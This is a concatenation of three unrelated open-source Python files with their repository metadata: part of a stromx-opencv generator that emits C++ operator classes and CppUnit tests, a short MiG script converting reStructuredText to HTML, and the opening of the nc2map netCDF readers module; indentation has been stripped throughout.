"""
def visitInput(self, inputArg):
self.__visit(inputArg)
def visitInputOutput(self, arg):
self.__visit(arg)
def visitOutput(self, output):
self.__visit(output)
def __visit(self, arg):
l = (
"if(! {0}Data->variant().isVariant({1}Description->variant()))"
).format(arg.ident, arg.ident.attribute())
self.doc.line(l)
self.doc.scopeEnter()
l = (
'throw runtime::InputError(INPUT_{0}, *this, "Wrong input data '
'variant.");'
).format(arg.ident.constant())
self.doc.line(l)
self.doc.scopeExit()
class CastedDataVisitor(MethodGenerator.DocVisitor):
"""
Exports the cast to a concrete stromx data type for each visited
input and output.
"""
def visitInput(self, inputArg):
l = ("const {1}* {0}CastedData = "
"runtime::data_cast<{1}>({0}Data);").format(inputArg.ident,
inputArg.dataType.typeId())
self.doc.line(l)
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
l = ("{1} * {0}CastedData = "
"runtime::data_cast<{1}>({0}Data);").format(output.ident,
output.dataType.typeId())
self.doc.line(l)
class CheckCastedDataVisitor(MethodGenerator.DocVisitor):
"""
Exports the data check for each visited input.
"""
def visitInput(self, inputArg):
self.__visit(inputArg)
def visitInputOutput(self, arg):
self.__visit(arg)
def visitOutput(self, output):
self.__visit(output)
def __visit(self, arg):
if arg.argType == package.ArgType.MATRIX:
l = (
"cvsupport::checkMatrixValue(*{0}CastedData, {1}Description, *this);"
).format(arg.ident, arg.ident.attribute())
self.doc.line(l)
else:
pass
class InitInVisitor(MethodGenerator.DocVisitor):
"""
Exports the initialization of the argument before the OpenCV
function is called.
"""
def visitConstant(self, arg):
self.__visit(arg)
def visitInputOutput(self, arg):
self.__visit(arg)
def visitOutput(self, output):
self.__visit(output)
def __visit(self, arg):
self.doc.document(arg.initIn)
class CvDataVisitor(MethodGenerator.DocVisitor):
"""
Exports the conversion to a native or OpenCV data type for each visited
argument.
"""
def visitInput(self, inputArg):
cvData = "{0} {1}CvData".format(inputArg.cvType.typeId(),
inputArg.ident)
castedData = "*{0}CastedData".format(inputArg.ident)
cast = inputArg.cvType.cast(castedData)
l = "{0} = {1};".format(cvData, cast)
self.doc.line(l)
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, inputArg):
cvData = "{0} {1}CvData".format(inputArg.cvType.typeId(),
inputArg.ident)
castedData = "*{0}CastedData".format(inputArg.ident)
cast = inputArg.cvType.cast(castedData)
l = "{0} = {1};".format(cvData, cast)
self.doc.line(l)
def visitAllocation(self, allocation):
cvData = "{0} {1}CvData;".format(allocation.cvType.typeId(),
allocation.ident)
self.doc.line(cvData)
def visitParameter(self, parameter):
if parameter.argType == package.ArgType.ENUM:
self.__visitEnumParameter(parameter)
else:
cvData = "{0} {1}CvData".format(parameter.cvType.typeId(),
parameter.ident)
castedData = parameter.cvType.cast(parameter.ident.attribute())
self.doc.line("{0} = {1};".format(cvData, castedData))
def __visitEnumParameter(self, parameter):
ident = parameter.ident
cvData = "{0} {1}CvData".format(parameter.cvType.typeId(),
ident)
castedData = "convert{0}({1})".format(ident.className(),
ident.attribute())
self.doc.line("{0} = {1};".format(cvData, castedData))
def visitRefInput(self, refInput):
cvData = "{0} {1}CvData".format(refInput.cvType.typeId(),
refInput.ident)
rhs = "{0}CvData".format(refInput.refArg.ident)
self.doc.line("{0} = {1};".format(cvData, rhs))
class MethodArgumentVisitor(ArgumentVisitorBase):
"""
Exports the argument of the OpenCV function for each visited argument.
"""
def __init__(self):
self.args = []
def visitInput(self, inputArg):
self.visit(inputArg)
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
self.visit(output)
def visitAllocation(self, allocation):
self.visit(allocation)
def visitParameter(self, parameter):
self.visit(parameter)
def visitConstant(self, constant):
value = constant.value
value = document.pythonToCpp(value)
self.args.append(str(value))
def visitRefInput(self, refInput):
self.visit(refInput)
def visitReturnValue(self, retValue):
pass
def visit(self, arg):
self.args.append("{0}CvData".format(arg.ident))
def visitCompound(self, compound):
self.args.append(compound.create())
def export(self):
    return ", ".join(self.args)
class MethodReturnValueVisitor(ArgumentVisitorBase):
"""
Exports the assignment of the OpenCV function's return value for the
visited return value argument.
"""
def __init__(self):
self.returnValue = ""
def visitReturnValue(self, retVal):
self.returnValue = "{0}CvData = ".format(retVal.ident)
def export(self):
return self.returnValue
class OutDataVisitor(MethodGenerator.DocVisitor):
"""
Exports the wrapping of the result data into a data container for
each visited output or allocation.
"""
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
l = "runtime::DataContainer {0}OutContainer = inContainer;".format(output.ident)
self.doc.line(l)
l = ("runtime::Id2DataPair {0}OutMapper(OUTPUT_{1}, "
"{0}OutContainer);").format(output.ident, output.ident.constant());
self.doc.line(l)
def visitAllocation(self, allocation):
dataType = allocation.dataType.typeId()
ident = allocation.ident
cvData = "{0}CvData".format(ident)
newObject = allocation.dataType.allocate(cvData)
l = "{0}* {1}CastedData = {2};".format(dataType, ident, newObject)
self.doc.line(l)
l = ("runtime::DataContainer {0}OutContainer = "
"runtime::DataContainer({0}CastedData);").format(ident)
self.doc.line(l)
l = ("runtime::Id2DataPair {0}OutMapper(OUTPUT_{1}, "
"{0}OutContainer);").format(ident, allocation.ident.constant())
self.doc.line(l)
class InitOutVisitor(MethodGenerator.DocVisitor):
"""
Exports the initialization of the output argument after the OpenCV
function is called.
"""
def visitAllocation(self, allocation):
self.doc.document(allocation.initOut)
class SendOutputDataVisitor(SingleArgumentVisitor):
"""
Exports the send output command for all visited outputs.
"""
def __init__(self):
self.line = ""
def visitAllocation(self, output):
self.__visit(output)
def visitOutput(self, output):
self.__visit(output)
def visitInputOutput(self, arg):
self.__visit(arg)
def export(self, doc):
if self.line != "":
doc.line("provider.sendOutputData({0});".format(self.line))
def __visit(self, arg):
if self.line == "":
self.line = "{0}OutMapper".format(arg.ident)
else:
self.line += " && {0}OutMapper".format(arg.ident)
class EnumConversionDefVisitor(MethodGenerator.DocVisitor):
"""
Exports the function which converts an enumeration value to its
OpenCV value for each visited enumeration parameter.
"""
def __init__(self, doc, m):
super(OpImplGenerator.EnumConversionDefVisitor, self).__init__(doc)
self.m = m
def visitParameter(self, parameter):
if parameter.argType != package.ArgType.ENUM:
return
name = parameter.ident.className()
l = ("int {1}::convert{0}(const runtime::Enum & value)"
).format(name, self.m.ident.className())
self.doc.line(l)
self.doc.scopeEnter()
self.doc.line("switch(int(value))")
self.doc.scopeEnter()
for desc in parameter.descriptions:
self.doc.label("case {0}".format(desc.ident))
self.doc.line("return {0};".format(desc.cvIdent))
self.doc.label("default")
self.doc.line(("throw runtime::WrongParameterValue(parameter(PARAMETER_{0}),"
" *this);").format(parameter.ident.constant()))
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.blank()
def generate(self):
self.__includes()
self.namespaceEnter()
self.__statics()
self.__constructor()
self.__getParameter()
self.__setParameter()
self.__setupInitParameters()
self.__setupParameters()
self.__setupInputs()
self.__setupOutputs()
self.__initialize()
self.__execute()
self.__convertEnumValues()
self.namespaceExit()
filename = "stromx/{0}/{1}.cpp".format(self.p.ident,
self.m.ident.className())
with open(filename, "w") as f:
f.write(self.doc.string())
def __includes(self):
cvModule = str(self.p.ident)[2:]
self.doc.line('#include "stromx/{0}/{1}.h"'\
.format(self.p.ident, self.m.ident.className()))
self.doc.blank()
self.doc.line('#include "stromx/{0}/Locale.h"'.format(self.p.ident))
self.doc.line('#include "stromx/{0}/Utility.h"'.format(self.p.ident))
self.doc.line('#include <stromx/cvsupport/Image.h>')
self.doc.line('#include <stromx/cvsupport/Matrix.h>')
self.doc.line('#include <stromx/cvsupport/Utilities.h>')
self.doc.line('#include <stromx/runtime/DataContainer.h>')
self.doc.line('#include <stromx/runtime/DataProvider.h>')
self.doc.line('#include <stromx/runtime/Id2DataComposite.h>')
self.doc.line('#include <stromx/runtime/Id2DataPair.h>')
self.doc.line('#include <stromx/runtime/ReadAccess.h>')
self.doc.line('#include <stromx/runtime/VariantComposite.h>')
self.doc.line('#include <stromx/runtime/WriteAccess.h>')
self.doc.line('#include <opencv2/{0}/{0}.hpp>'.format(cvModule))
self.doc.blank()
def __statics(self):
method = self.m.ident.className()
package = self.p.ident.upper()
self.doc.line(("const std::string {0}::PACKAGE(STROMX_{1}_PACKAGE_"
"NAME);").format(method, package))
self.doc.line(("const runtime::Version {0}::VERSION("
"STROMX_{1}_VERSION_MAJOR, STROMX_{1}_VERSION_MINOR, "
"STROMX_{1}_VERSION_PATCH);".format(method, package)))
self.doc.line('const std::string {0}::TYPE("{0}");'.format(method))
self.doc.blank()
def __constructor(self):
self.doc.line("{0}::{0}()".format(self.m.ident.className()))
self.doc.line(" : runtime::OperatorKernel(TYPE, PACKAGE, VERSION, "
"setupInitParameters()),")
self.doc.increaseIndent()
v = OpImplGenerator.ParameterInitVisitor()
self.visitParameters(v)
v.export(self.doc)
self.doc.decreaseIndent()
self.doc.scopeEnter()
self.doc.scopeExit()
self.doc.blank()
def __getParameter(self):
self.doc.line("const runtime::DataRef {0}::getParameter"
"(unsigned int id) const"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("switch(id)")
self.doc.scopeEnter()
v = OpImplGenerator.GetParametersVisitor(self.doc)
self.visitParameters(v)
self.doc.label("default")
self.doc.line("throw runtime::WrongParameterId(id, *this);")
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.blank()
def __setParameter(self):
self.doc.line("void {0}::setParameter"
"(unsigned int id, const runtime::Data& value)"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("try")
self.doc.scopeEnter()
self.doc.line("switch(id)")
self.doc.scopeEnter()
v = OpImplGenerator.SetParametersVisitor(self.doc)
self.visitParameters(v)
self.doc.label("default")
self.doc.line("throw runtime::WrongParameterId(id, *this);")
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.line("catch(runtime::BadCast&)")
self.doc.scopeEnter()
self.doc.line("throw runtime::WrongParameterType(parameter(id), *this);")
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.blank()
def __setupInitParameters(self):
self.doc.line("const std::vector<const runtime::Parameter*> "
"{0}::setupInitParameters()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("std::vector<const runtime::Parameter*> parameters;")
self.doc.blank()
if len(self.m.options) > 1:
v = OpImplGenerator.SetupParametersVisitor(self.doc, isInit = True)
self.optionParam.accept(v)
self.doc.line("return parameters;")
self.doc.scopeExit()
self.doc.blank()
def __setupParameters(self):
self.doc.line("const std::vector<const runtime::Parameter*> "
"{0}::setupParameters()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("std::vector<const runtime::Parameter*> parameters;")
self.doc.blank()
self.doc.line("switch(int({0}))".format(
self.optionParam.ident.attribute()))
self.doc.scopeEnter()
for o in self.m.options:
self.doc.label("case({0})".format(o.ident.constant()))
self.doc.scopeEnter()
v = OpImplGenerator.SetupParametersVisitor(self.doc)
for arg in o.args:
arg.accept(v)
self.doc.scopeExit()
self.doc.line("break;")
self.doc.scopeExit()
self.doc.blank()
self.doc.line("return parameters;")
self.doc.scopeExit()
self.doc.blank()
def __setupInputs(self):
self.doc.line("const std::vector<const runtime::Input*> "
"{0}::setupInputs()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("std::vector<const runtime::Input*> inputs;")
self.doc.blank()
self.doc.line("switch(int({0}))".format(
self.optionParam.ident.attribute()))
self.doc.scopeEnter()
for o in self.m.options:
self.doc.label("case({0})".format(o.ident.constant()))
self.doc.scopeEnter()
v = OpImplGenerator.SetupInputsVisitor(self.doc)
for arg in o.args:
arg.accept(v)
self.doc.scopeExit()
self.doc.line("break;")
self.doc.scopeExit()
self.doc.blank()
self.doc.line("return inputs;")
self.doc.scopeExit()
self.doc.blank()
def __setupOutputs(self):
self.doc.line("const std::vector<const runtime::Output*> "
"{0}::setupOutputs()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("std::vector<const runtime::Output*> outputs;")
self.doc.blank()
self.doc.line("switch(int({0}))".format(
self.optionParam.ident.attribute()))
self.doc.scopeEnter()
for o in self.m.options:
self.doc.label("case({0})".format(o.ident.constant()))
self.doc.scopeEnter()
v = OpImplGenerator.SetupOutputsVisitor(self.doc)
self.visitOption(o, v)
self.doc.scopeExit()
self.doc.line("break;")
self.doc.scopeExit()
self.doc.blank()
self.doc.line("return outputs;")
self.doc.scopeExit()
self.doc.blank()
def __initialize(self):
self.doc.line("void {0}::initialize()"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("runtime::OperatorKernel::initialize(setupInputs(), "
"setupOutputs(), setupParameters());")
self.doc.scopeExit()
self.doc.blank()
def __execute(self):
self.doc.line("void {0}::execute(runtime::DataProvider & provider)"\
.format(self.m.ident.className()))
self.doc.scopeEnter()
self.doc.line("switch(int({0}))".format(
self.optionParam.ident.attribute()))
self.doc.scopeEnter()
for o in self.m.options:
self.doc.label("case({0})".format(o.ident.constant()))
self.doc.scopeEnter()
v = OpImplGenerator.InputMapperVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.ReceiveInputDataVisitor()
self.visitOption(o, v)
v.export(self.doc)
self.doc.blank()
v = OpImplGenerator.InDataVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.AccessVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.CopyWriteAccessVisitor()
self.visitOption(o, v)
v.export(self.doc)
v = OpImplGenerator.CheckVariantVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.CastedDataVisitor(self.doc)
self.visitOption(o, v)
v = OpImplGenerator.CheckCastedDataVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
if o.inputCheck != None:
self.doc.document(o.inputCheck)
self.doc.blank()
v = OpImplGenerator.InitInVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.CvDataVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.MethodReturnValueVisitor()
self.visitOption(o, v)
retVal = v.export()
v = OpImplGenerator.MethodArgumentVisitor()
self.visitOption(o, v)
argStr = v.export()
namespace = ""
if self.m.namespace != "":
namespace = "{0}::".format(self.m.namespace)
self.doc.line("{3}{2}{0}({1});".format(self.m.ident, argStr,
namespace, retVal))
if o.postCall != None:
self.doc.document(o.postCall)
self.doc.blank()
v = OpImplGenerator.OutDataVisitor(self.doc)
self.visitOption(o, v)
self.doc.blank()
v = OpImplGenerator.InitOutVisitor(self.doc)
self.visitOption(o, v)
v = OpImplGenerator.SendOutputDataVisitor()
self.visitOption(o, v)
v.export(self.doc)
self.doc.scopeExit()
self.doc.line("break;")
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.blank()
def __convertEnumValues(self):
v = OpImplGenerator.EnumConversionDefVisitor(self.doc, self.m)
self.visitParameters(v, False)
class OpTestGenerator(object):
"""
Abstract base class of all generators which output operator tests.
"""
def testNames(self):
l = []
for o in self.m.options:
for i in range(len(o.tests)):
l.append("test{0}{1}".format(o.ident.className(), i))
return l
class OpTestHeaderGenerator(MethodGenerator, OpTestGenerator):
"""
Generates the header of an operator test.
"""
def generate(self):
self.__includeGuardEnter()
self.__includes()
self.namespaceEnter()
self.__classEnter()
self.__testSuite()
self.doc.blank()
self.doc.label("public")
self.__constructor()
self.doc.line("void setUp();")
self.doc.line("void tearDown();")
self.doc.blank()
self.doc.label("protected")
self.__testMethods()
self.doc.blank()
self.doc.label("private")
self.doc.line("runtime::OperatorTester* m_operator;")
self.__classExit()
self.namespaceExit()
self.__includeGuardExit()
filename = "stromx/{0}/test/{1}Test.h".format(self.p.ident,
self.m.ident.className())
with open(filename, "w") as f:
f.write(self.doc.string())
def __includeGuardEnter(self):
self.doc.line("#ifndef {0}".format(self.__includeGuard()))
self.doc.line("#define {0}".format(self.__includeGuard()))
self.doc.blank()
def __includes(self):
self.doc.line('#include "stromx/{0}/Config.h"'.format(self.p.ident))
self.doc.blank()
self.doc.line('#include <cppunit/extensions/HelperMacros.h>')
self.doc.line('#include <cppunit/TestFixture.h>')
self.doc.blank()
self.doc.line('#include "stromx/runtime/OperatorTester.h"')
self.doc.blank()
def __includeGuardExit(self):
self.doc.line("#endif // {0}".format(self.__includeGuard()))
def __includeGuard(self):
return "STROMX_{0}_{1}TEST_H".format(self.p.ident.upper(),
self.m.ident.upper())
def __classEnter(self):
self.doc.line((
"class {0}Test : public CPPUNIT_NS::TestFixture"
).format(self.m.ident.className()))
self.doc.line("{")
self.doc.increaseIndent()
def __testSuite(self):
self.doc.line((
"CPPUNIT_TEST_SUITE({0}Test);"
).format(self.m.ident.className()))
for test in self.testNames():
self.doc.line("CPPUNIT_TEST({0});".format(test))
self.doc.line("CPPUNIT_TEST_SUITE_END();")
def __constructor(self):
self.doc.line((
"{0}Test() : m_operator(0) {{}}"
).format(self.m.ident.className()))
def __testMethods(self):
for test in self.testNames():
self.doc.line("void {0}();".format(test))
def __classExit(self):
self.doc.decreaseIndent()
self.doc.line("};")
class OpTestImplGenerator(MethodGenerator, OpTestGenerator):
"""
Generates the implementation of an operator test.
"""
def __includes(self):
self.doc.line((
'#include "stromx/{0}/test/{1}Test.h"'
).format(self.p.ident, self.m.ident.className()))
self.doc.blank()
self.doc.line('#include <stromx/runtime/OperatorException.h>')
self.doc.line('#include <stromx/runtime/ReadAccess.h>')
self.doc.line('#include "stromx/cvsupport/Image.h"')
self.doc.line((
'#include "stromx/{0}/{1}.h"'
).format(self.p.ident, self.m.ident.className()))
self.doc.blank()
def __testSuite(self):
self.doc.line((
"CPPUNIT_TEST_SUITE_REGISTRATION (stromx::{0}::{1}Test);"
).format(self.p.ident, self.m.ident.className()))
self.doc.blank()
def __setUp(self):
className = self.m.ident.className()
self.doc.line("void {0}Test::setUp()".format(className))
self.doc.scopeEnter()
self.doc.line((
"m_operator = new stromx::runtime::OperatorTester(new {0});"
).format(self.m.ident.className()))
self.doc.scopeExit()
self.doc.blank()
def __tearDown(self):
className = self.m.ident.className()
self.doc.line("void {0}Test::tearDown()".format(className))
self.doc.scopeEnter()
self.doc.line("delete m_operator;")
self.doc.scopeExit()
self.doc.blank()
def __testMethods(self):
className = self.m.ident.className()
for o in self.m.options:
for i, test in enumerate(o.tests):
testName = "test{0}{1}".format(o.ident.className(), i)
self.doc.line(
"void {0}Test::{1}()".format(className, testName)
)
self.doc.scopeEnter()
if len(self.m.options) > 1:
index = "{0}::PARAMETER_DATA_FLOW".format(self.m.ident.className())
value = (
"runtime::Enum({0}::{1})"
).format(self.m.ident.className(), o.ident.constant())
l = "m_operator->setParameter({0}, {1});".format(index, value)
self.doc.line(l)
self.doc.line("m_operator->initialize();")
self.doc.line("m_operator->activate();")
self.doc.blank()
testgenerator.generate(self.doc, self.m, o.args,
test, testName)
self.doc.scopeExit()
self.doc.blank()
def generate(self):
self.__includes()
self.__testSuite()
self.namespaceEnter()
self.__setUp()
self.__tearDown()
self.__testMethods()
self.namespaceExit()
filename = "stromx/{0}/test/{1}Test.cpp".format(self.p.ident,
self.m.ident.className())
with open(filename, "w") as f:
f.write(self.doc.string())
def generateMethodFiles(package, method):
"""
Generates the operator and the operator tests for the given method.
"""
g = OpHeaderGenerator()
g.save(package, method)
g = OpImplGenerator()
g.save(package, method)
g = OpTestHeaderGenerator()
g.save(package, method)
g = OpTestImplGenerator()
g.save(package, method)
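# Hedged usage sketch (not part of the original module): `p` and `m` are
# assumed to be package and method description objects as built elsewhere
# in the generator package.
#
#   g = OpHeaderGenerator()
#   g.save(p, m, printResult=True)  # write the header and echo it to stdout
#   generateMethodFiles(p, m)       # or generate all four files at once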
if __name__ == "__main__":
import doctest
doctest.testmod()
|
uboot/stromx-opencv
|
opencv/methodgenerator.py
|
Python
|
apache-2.0
| 62,812
|
[
"VisIt"
] |
50161b6438dfe7282357aaf833b623146d3651871ae0083b74be15c1df46eeeb
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# html_writer - helpers for translating reStructuredText to HTML via docutils
# Copyright (C) 2003-2009 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
from docutils.writers.html4css1 import Writer, HTMLTranslator
from docutils.core import publish_string
# Setup a translator writer
html_writer = Writer()
html_writer.translator_class = HTMLTranslator
# Setup a restructured text example
reST = \
"""
Example of reST:
================
This is a small example of the way reST can be used as a base for generating HTML-formatted text that:
- looks nice
- is standards compliant
- is flexible
We *may* decide to start using this as text formatting tool in MiG__ later on.
__ http://mig-1.imada.sdu.dk/
We can also use it for creating tables if we want to:
===== ===== ======
Input Output
----- ----- ------
A B A or B
===== ===== ======
False False False
True False True
False True True
True True True
===== ===== ======
Have fun!
----
Cheers, Jonas
"""
# Translate reST to html
html = publish_string(reST, settings_overrides={'output_encoding': 'unicode'},
                      writer=html_writer)
print html
|
heromod/migrid
|
mig/reST/html_writer.py
|
Python
|
gpl-2.0
| 1,966
|
[
"Brian"
] |
965e3ce4dfc91bc837b1e2ed01fcface72579c98654231af7420171e395df2de
|
# -*- coding: utf-8 -*-
"""readers module of the nc2map python module
This script contains the basic data danagement utilities in the nc2map
module.
It contains the following reader classes
- The ReaderBase class defines the main methods for all readers,
such as data extraction, the merging method and the arithmetics.
- The NCReader class is a wrapper around a netCDF4.Dataset instance
and implemented as a subclass of ReaderBase
- The MFNCReader class is a wrapper around a netCDF4.MFDataset instance
and implemented as a subclass of ReaderBase
- The ArrayReader is a class mimiking the structure of the netCDF4.Dataset
but without the storing of data in a file.
Furthermore it contains the DataField class, a wrapper around a
numpy.ma.MaskedArray with enhanced capabilities. And it contains the
Variable class which is the comparable version of the netCDF4.Variable class
but for ArrayReader instances."""
import os
import glob
import logging
from itertools import (izip, izip_longest, product, imap, chain, cycle, repeat,
tee)
from collections import OrderedDict
import datetime as dt
import numpy as np
import netCDF4 as nc
from .warning import warn, critical, Nc2MapRuntimeWarning
import mpl_toolkits.basemap as bm
from matplotlib.tri import Triangulation, TriAnalyzer
from nc_utils import chunk_shape_3D
from .defaults import readers as defaults
try:
from xray import Dataset as xrayDataset, open_dataset, open_mfdataset
except ImportError as xray_io_error:
def open_dataset(*args, **kwargs):
raise ImportError(xray_io_error.message)
open_mfdataset = open_dataset
xrayDataset = None
defaultnames = defaults['dimnames']
readers = ['NCReader', 'MFNCReader', 'XrayReader', 'MFXrayReader',
'ArrayReader']
def auto_set_reader(*args, **kwargs):
"""Function to choose a reader automatically via try and error.
Arguments and keyword arguments are passed directly to the reader class.
Keyword arguments (beside the one for the reader initialization) are
- readers: list of strings with reader names (if not the default readers
shall be used). Otherwise the following default readers will be used:
"""
# docstring is extended below
logger = logging.getLogger("%s.auto_set_reader" % __name__)
# check if input is a reader
if len(args) == 1:
logger.debug("Found one input argument --> Check if reader")
data_reader = args[0]
if (hasattr(data_reader, 'get_data')
and hasattr(data_reader, 'lola_variables')):
logger.debug(
"Found get_data method and lola_variables --> Assume reader!")
return data_reader
else:
logger.debug(
"Did not find get_data method and lola_variables in "
"input... Try now the different readers...")
else:
logger.debug("Found multiple arguments --> try different readers")
try:
test_readers = kwargs.pop('readers')
except KeyError:
test_readers = readers
logger.debug("Set reader automatically. Order of trial is %s",
', '.join(test_readers))
success = False
for reader in test_readers:
try:
logger.debug("Try %s...", reader)
data_reader = globals()[reader](*args, **kwargs)
logger.debug("Suceeded.")
success = True
break
except Exception as e:
logger.debug("Failed.", exc_info=True)
if not success:
raise IOError(
"Could not open any reader with one of %s. Try manually!" %
', '.join(test_readers))
return data_reader
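# Hedged usage sketch (file names assumed for illustration):
#
#   reader = auto_set_reader('data.nc')  # tries NCReader, MFNCReader, ...
#   reader = auto_set_reader('*.nc', readers=['MFNCReader'])
#   reader = auto_set_reader(existing_reader)  # readers are passed through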
class Icon_Triangles(object):
def get_triangles(self, reader, varo=None, convert_spatial=True):
"""Get the longitude informations and triangles of an ICON-like grid
This function extracts the triangles in an unstructered ICON-like[1]_
grid. This grid consists of centered longitude informations, stored in
variable *clon*, centered latitude informations, stored in variable
*clat*, and the vortex coordinates, stored in variable *clon_vertices*
and *clat_vertices*.
Parameters
----------
reader: :class:`~nc2map.ReaderBase` instance
reader containing the grid informations
varo: object
variable object containing the data (only used for compatibility)
convert_spatial: bool, optional
Default: True. If this is True, and the spatial dimensions
(latitudes, longitudes) are in radians, they are converted to
degrees
Returns
-------
lon: 1D-array of longitudes
lat: 1D-array of latitudes
triang: matplotlib.tri.Triangulation instance with the triangle
definitions
Raises
------
nc2map.readers.GridError
if `reader` does not have the above mentioned variables
.. [1] Max-Planck-Institute for Meteorology, "ICON (Icosahedral
non-hydrostatic) general circulation model",
:ref:`http://www.mpimet.mpg.de/en/science/models/icon.html`,
accessed June 23, 2015"""
self.test(reader)
clon = reader.variables['clon']
clat = reader.variables['clat']
clonv = reader.variables['clon_vertices']
clatv = reader.variables['clat_vertices']
triangles = np.reshape(range(len(clon)*3), (len(clon), 3))
if convert_spatial:
try:
units = clon.units
except AttributeError:
units = None
clon = reader.convert_spatial(clon, units, raise_error=False,
vname='clon')
clonv = reader.convert_spatial(clonv, units, raise_error=False,
vname='clon_vertices').ravel()
try:
units = clat.units
except AttributeError:
units = None
clat = reader.convert_spatial(clat, units, raise_error=False,
vname='clat')
clatv = reader.convert_spatial(clatv, units, raise_error=False,
vname='clat_vertices').ravel()
else:
clon = clon[:]
clat = clat[:]
clonv = clonv[:].ravel()
clatv = clatv[:].ravel()
return clon, clat, Triangulation(clonv, clatv, triangles=triangles)
def test(self, reader, varo=None):
"""Test the reader if it matches the conventions"""
miss = {'clon', 'clat', 'clon_vertices', 'clat_vertices'} - set(
reader.variables)
if miss:
raise GridError(
"Missing grid variables: %s" % ', '.join(miss))
def get_coords(self, reader, varo=None):
self.test(reader)
return {
'clon': reader.variables['clon'],
'clat': reader.variables['clat'],
'clon_vertices': reader.variables['clon_vertices'],
'clat_vertices': reader.variables['clat_vertices']}
class Ugrid_Triangles(object):
def get_triangles(self, reader, varo, convert_spatial=True):
"""Get the longitude informations and triangles of an unstructured grid
This function extracts the triangles in an unstructered grid that
follows the Ugrid conventions.
Parameters
----------
reader: :class:`~nc2map.ReaderBase` instance
reader containing the grid informations
varo: object
variable object containing the data (only used for compatibility)
convert_spatial: bool, optional
Default: True. If this is True, and the spatial dimensions
(latitudes, longitudes) are in radians, they are converted to
degrees
Returns
-------
lon: 1D-array of longitudes
lat: 1D-array of latitudes
triang: matplotlib.tri.Triangulation instance with the triangle
definitions
Raises
------
nc2map.readers.GridError
if `reader` does not follow the Ugrid conventions"""
(lonname, lon), (latname, lat), (triname, triangles) = self.test(
reader, varo)
if convert_spatial:
lon = reader.convert_spatial(lon, vname=reader.lonnames)
lat = reader.convert_spatial(lat, vname=reader.latnames)
return lon[:], lat[:], Triangulation(lon[:], lat[:],
triangles=triangles[:])
def test(self, reader, varo):
"""Tests the reader and returns grid informations"""
try:
mesh = varo.mesh
except AttributeError:
raise GridError("Variable does not have a mesh defined!")
try:
mesh = reader.variables[mesh]
except KeyError:
raise GridError("Mesh %s was not found in the reader!" % mesh)
try:
nodes = mesh.node_coordinates.split()[:2]
if not len(nodes) == 2:
raise GridError(
"Need two node_coordinates variables, but found only "
"one ({0})".format(nodes[0]))
except AttributeError:
raise GridError(
"Topology variable does not have a valid (space-separated) "
"node_coordinates attribute")
try:
lon = reader.variables[nodes[0]]
except KeyError:
raise GridError("Did not found variable %s in reader!" % nodes[0])
try:
lat = reader.variables[nodes[1]]
except KeyError:
raise GridError("Did not found variable %s in reader!" % nodes[1])
try:
triangles = mesh.face_node_connectivity
except AttributeError:
raise GridError(
"Topology variable does not have a face_node_connectivity "
"attribute!")
try:
triangles = reader.variables[triangles]
except KeyError:
raise GridError(
"face_node_connectivity variable {0} was not found in the "
"reader!".format(triangles))
return [(nodes[0], lon), (nodes[1], lat),
(mesh.face_node_connectivity, triangles)]
def get_coords(self, reader, varo):
coords = dict(self.test(reader, varo))
mesh = varo.mesh
coords[mesh] = reader.variables[mesh]
return coords
ufuncs = [Ugrid_Triangles(), Icon_Triangles()]
def dimprop(x, doc):
"""Function which creates a dimension property
Sets up the dimension by using self.nco and the given dimension name"""
# ---- not used at the moment ----
def getx(self):
if getattr(self, x+'names') is None:
return None
return self.variables[getattr(self, x+'names')]
return property(getx, doc=doc)
def dimlist(x):
"""Function which creates a property get the string out of the set
value, which is also in the variables attribute"""
def getx(self):
names = [name for name in getattr(self, '_'+x)
if name in self.variables]
if len(names) == 0:
names = [None]
elif len(names) > 1:
raise ValueError(
"Found multiple %s in the Reader: %s" % (
x, ', '.join(names)))
return names[0]
def setx(self, dims):
if isinstance(dims, (str, unicode)):
setattr(self, '_'+x, {dims})
else:
setattr(self, '_'+x, set(dims))
def delx(self):
delattr(self, '_'+x)
doc = """
Name of the %s dimension. Set it with a string or list of strings, get
the dimension name in the reader as string""" % (
x.replace('names', ''))
return property(getx, setx, delx, doc)
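# Hedged sketch of the intended use of dimlist (class name assumed):
#
#   class SomeReader(ReaderBase):
#       lonnames = dimlist('lonnames')
#
#   r = SomeReader(...)
#   r.lonnames = ['lon', 'longitude']  # candidate dimension names
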